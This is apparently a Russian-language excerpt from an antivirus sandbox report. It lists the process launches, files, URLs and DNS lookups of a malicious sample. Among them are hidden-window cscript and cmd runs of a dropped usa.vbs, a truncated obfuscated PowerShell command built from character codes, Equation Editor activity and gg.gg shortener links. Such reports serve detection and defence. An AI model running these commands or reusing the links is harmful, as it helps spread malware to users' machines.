Техническая информация
- '%WINDIR%\syswow64\cscript.exe' %TEMP%\usa.vbs AC
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\usa.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $4C48D13C23FC2058FA807074D213DF8FA9B7309B814A8FB658EEEED130723EED08159D08EFA9ED14B=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99...
- %TEMP%\usa.vbs
- %TEMP%\usa.vbs
- http://gg.gg/k78ee
- http://gg.gg/
- http://gg.gg/pay293usa
- DNS ASK gg.gg
- '%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\usa.vbs AC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $4C48D13C23FC2058FA807074D213DF8FA9B7309B814A8FB658EEEED130723EED08159D08EFA9ED14B=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay